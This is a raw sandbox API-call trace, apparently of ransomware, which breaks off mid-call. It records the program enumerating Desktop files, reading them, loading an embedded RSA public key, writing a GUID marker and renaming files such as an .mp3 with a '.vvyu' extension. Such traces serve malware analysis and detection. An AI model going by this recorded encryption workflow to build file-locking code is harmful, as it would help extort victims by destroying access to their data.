RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0188.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0188.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.074] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0188.075] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.075] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.075] CloseHandle (hObject=0x584) returned 1 [0188.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2ae3ea0 [0188.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.077] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\5EtXO0qde4mAaAj2.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\5etxo0qde4maaaj2.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\5EtXO0qde4mAaAj2.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\5etxo0qde4maaaj2.mp3.vvyu")) returned 1 [0188.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.079] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.082] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d25400, ftCreationTime.dwHighDateTime=0x1d89b69, ftLastAccessTime.dwLowDateTime=0xb8c29390, ftLastAccessTime.dwHighDateTime=0x1d8a0f9, ftLastWriteTime.dwLowDateTime=0xb8c29390, ftLastWriteTime.dwHighDateTime=0x1d8a0f9, nFileSizeHigh=0x0, nFileSizeLow=0xd6c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9Ouhy.mp3", cAlternateFileName="")) returned 1 [0188.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae20f8 [0188.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae20f8 | out: hHeap=0x2c0000) returned 1 [0188.082] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\9Ouhy.mp3") returned=".mp3" [0188.082] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\9Ouhy.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\9ouhy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.083] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=54980) returned 1 [0188.083] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.085] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd69e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.086] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.089] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.089] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xd6c4, lpOverlapped=0x0) returned 1 [0188.090] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.090] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.090] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.090] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.091] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.091] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.091] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.091] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.092] GetLastError () returned 0x0 [0188.092] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.093] SetLastError (dwErrCode=0x0) [0188.093] GetLastError () returned 0x0 [0188.094] SetLastError (dwErrCode=0x0) [0188.094] GetLastError () returned 0x0 [0188.094] SetLastError (dwErrCode=0x0) [0188.094] GetLastError () returned 0x0 [0188.094] SetLastError (dwErrCode=0x0) [0188.094] GetLastError () returned 0x0 [0188.094] SetLastError (dwErrCode=0x0) [0188.094] GetLastError () returned 0x0 [0188.094] SetLastError (dwErrCode=0x0) [0188.094] GetLastError () returned 0x0 [0188.094] SetLastError (dwErrCode=0x0) [0188.094] GetLastError () returned 0x0 [0188.094] SetLastError (dwErrCode=0x0) [0188.094] GetLastError () returned 0x0 [0188.094] SetLastError (dwErrCode=0x0) [0188.094] GetLastError () returned 0x0 [0188.094] SetLastError (dwErrCode=0x0) [0188.094] GetLastError () returned 0x0 [0188.094] SetLastError (dwErrCode=0x0) [0188.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.095] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.095] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.095] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.095] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.095] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6c0) returned 0x2ae3ea0 [0188.096] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae20f8 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d778 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae20b0 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d898 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0188.098] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2af1568 [0188.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1788 [0188.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1788 | out: hHeap=0x2c0000) returned 1 [0188.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d838 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d820 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1568 | out: hHeap=0x2c0000) returned 1 [0188.101] GetCurrentThreadId () returned 0x5d8 [0188.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee020 [0188.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.102] GetCurrentThreadId () returned 0x5d8 [0188.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0188.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d838 [0188.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0188.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8e0 [0188.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8f8 [0188.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d850 [0188.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d820 [0188.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1568 [0188.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af1778 [0188.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.106] RtlAllocateHeap 